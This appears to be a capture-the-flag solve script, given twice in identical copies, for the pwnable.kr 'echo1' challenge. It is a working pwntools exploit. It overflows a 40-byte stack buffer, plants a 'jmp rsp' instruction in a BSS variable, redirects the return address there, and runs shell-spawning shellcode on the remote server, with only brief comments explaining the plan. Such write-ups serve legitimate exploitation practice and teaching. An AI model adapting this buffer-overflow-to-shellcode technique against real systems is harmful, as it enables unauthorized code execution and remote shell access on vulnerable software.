Pascal-0x90/solve.py

## solve.py
#!/usr/bin/python

###################################
# Std imports
import sys

# Third party Imports
from pwn import *

# Binary
BINARY = sys.argv[1]

# Pwntools Binary info
context(os='linux', arch='amd64')
r = ROP(BINARY)
e = ELF(BINARY)
l = e.libc

# Connections and interactions
#p = process(BINARY)
p = remote("pwnable.kr", 9010)

# GDB anyone?
#gdb.attach(p)
#input("Ready to roll?")
###################################

# Junk to fill up buffer
JUNK = b"i"*40

'''
Main idea:
    - Since NX is off, we want to try to execute shellcode
    - Literally no jmp exists
        - Furthermore, I dont want to do complex ropping
    - We can write to:
        - id (in bss)
        - s (on stack)
        - o (maybe?? it in heap though)
    - We may be able to overwrite some location we know with:
        - Address
        - Assembly
    - Problem is if it is executable or not.
'''

# Address of id. Is in BSS
ID = 0x6020A0

# What do we want to put there? #OverwriteTheBSS
jrsp = "jmp rsp"
jmp_rsp = asm(jrsp)

# What shellcode do we want to execute
sc = shellcraft.sh() # Yeah we are kinda basic here

'''
Flow:
    1. Overwrite ret with address of jmp instruction
    2. jump to shellcode
    3. interact with new bash shell!

buffer + addy + shellcode
'''

# Create our payload
pay = JUNK
pay += p64(ID) # p64 since this is a 64 bit binary
pay += asm(sc) # Our shellcode to execute once jumping back to stack

# Check our length of payload
log.info(f"Payload Length: {len(pay)}")

'''
In order to set the id as contents of assembly,
we will send it in as the first thing asked for
in the program's execution.
'''
# Recv till ready to read
p.clean()

'''
Important thing to remember here, sometimes what func
we use to send intput (ie, sendline vs send) may matter
since that extra space or newline does account for our
input. Since this case we are telling the program to jump
to this location, even if there is some arbitrary value
after the assembly, the jump gets taken first so it's
negligible in this instance.
'''
# Send in our asm
p.writeline(jmp_rsp.ljust(6,b"\0"))

# Now send our option of "echo" type
p.sendline("1")

# Send in our actual payload
p.sendline(pay)

# Should have a shell now, do interactive to check
p.interactive()
p.clean()
'''
p.sendline("cat echo1")

data = p.recvall(timeout=2)
print(data)
'''
	#!/usr/bin/python

	###################################
	# Std imports
	import sys

	# Third party Imports
	from pwn import *

	# Binary
	BINARY = sys.argv[1]

	# Pwntools Binary info
	context(os='linux', arch='amd64')
	r = ROP(BINARY)
	e = ELF(BINARY)
	l = e.libc

	# Connections and interactions
	#p = process(BINARY)
	p = remote("pwnable.kr", 9010)

	# GDB anyone?
	#gdb.attach(p)
	#input("Ready to roll?")
	###################################

	# Junk to fill up buffer
	JUNK = b"i"*40

	'''
	Main idea:
	- Since NX is off, we want to try to execute shellcode
	- Literally no jmp exists
	- Furthermore, I dont want to do complex ropping
	- We can write to:
	- id (in bss)
	- s (on stack)
	- o (maybe?? it in heap though)
	- We may be able to overwrite some location we know with:
	- Address
	- Assembly
	- Problem is if it is executable or not.
	'''

	# Address of id. Is in BSS
	ID = 0x6020A0

	# What do we want to put there? #OverwriteTheBSS
	jrsp = "jmp rsp"
	jmp_rsp = asm(jrsp)

	# What shellcode do we want to execute
	sc = shellcraft.sh() # Yeah we are kinda basic here

	'''
	Flow:
	1. Overwrite ret with address of jmp instruction
	2. jump to shellcode
	3. interact with new bash shell!

	buffer + addy + shellcode
	'''

	# Create our payload
	pay = JUNK
	pay += p64(ID) # p64 since this is a 64 bit binary
	pay += asm(sc) # Our shellcode to execute once jumping back to stack

	# Check our length of payload
	log.info(f"Payload Length: {len(pay)}")

	'''
	In order to set the id as contents of assembly,
	we will send it in as the first thing asked for
	in the program's execution.
	'''
	# Recv till ready to read
	p.clean()

	'''
	Important thing to remember here, sometimes what func
	we use to send intput (ie, sendline vs send) may matter
	since that extra space or newline does account for our
	input. Since this case we are telling the program to jump
	to this location, even if there is some arbitrary value
	after the assembly, the jump gets taken first so it's
	negligible in this instance.
	'''
	# Send in our asm
	p.writeline(jmp_rsp.ljust(6,b"\0"))

	# Now send our option of "echo" type
	p.sendline("1")

	# Send in our actual payload
	p.sendline(pay)

	# Should have a shell now, do interactive to check
	p.interactive()
	p.clean()
	'''
	p.sendline("cat echo1")

	data = p.recvall(timeout=2)
	print(data)
	'''